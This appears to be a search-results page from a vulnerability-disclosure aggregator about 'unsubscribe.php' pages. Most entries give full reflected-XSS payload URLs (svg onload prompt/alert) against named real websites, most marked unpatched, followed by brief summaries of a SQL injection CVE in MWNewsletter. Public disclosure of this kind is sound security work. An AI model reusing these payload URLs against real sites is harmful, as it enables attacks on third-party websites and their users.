12 matches found
EUVD-2006-1692
Malware in sbrugna...
lojge.ohq.trade XSS vulnerability
Vulnerable URL: http://lojge.ohq.trade/unsubscribe.php?M=Guitch" Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated Google Pagerank| 0 VIP website status:| No...
michaelsutter.com XSS vulnerability
Vulnerable URL: https://www.michaelsutter.com/php/Unsubscribe.php?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1150273 Google...
onetwotrade.com XSS vulnerability
Vulnerable URL: https://www.onetwotrade.com/unsubscribe.php?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 130728 Google Pageran...
parkertools.co.uk XSS vulnerability
Vulnerable URL: http://www.parkertools.co.uk/Unsubscribe.php?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2858948 Google...
projectmanana.org XSS vulnerability
Vulnerable URL: http://www.projectmanana.org/unsubscribe.php?Email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 10:24 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa...
jeffersoncompanies.com XSS vulnerability
Vulnerable URL: http://jeffersoncompanies.com/marketing/unsubscribe.php?email=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2037865...
success.bz XSS vulnerability
Vulnerable URL: http://www.success.bz/actions/[email protected]=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| Yes, at 26.07.2017 Latest check for patch:| 26.07.2017 10:24 GMT Vulnerability type:| XSS Vulnerability status:|...
thebigchoice.com XSS vulnerability
Vulnerable URL: http://www.thebigchoice.com/unsubscribe.php?email=%22%3E%3CsVg/OnLOaD=alert%28%22XSSPOSED%22%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 623490 Google...
Sql injection
Multiple SQL injection vulnerabilities in MWNewsletter 1.0.0b allow remote attackers to execute arbitrary SQL commands via the 1 useremail parameter to a unsubscribe.php or b subscribe.php; or the 2 username parameter to subscribe.php. NOTE: the provenance of this information is unknown; the...
Sql injection
SQL injection vulnerability in MWNewsletter 1.0.0b allows remote attackers to execute arbitrary SQL commands via the username parameter to unsubscribe.php...
CVE-2006-1692
CVE-2006-1692 concerns MWNewsletter 1.0.0b, where multiple SQL injection flaws are exposed via input parameters. Specifically, unsanitized user_email (in unsubscribe.php and subscribe.php) and user_name (in subscribe.php) allow remote attackers to inject arbitrary SQL commands, enabling potential...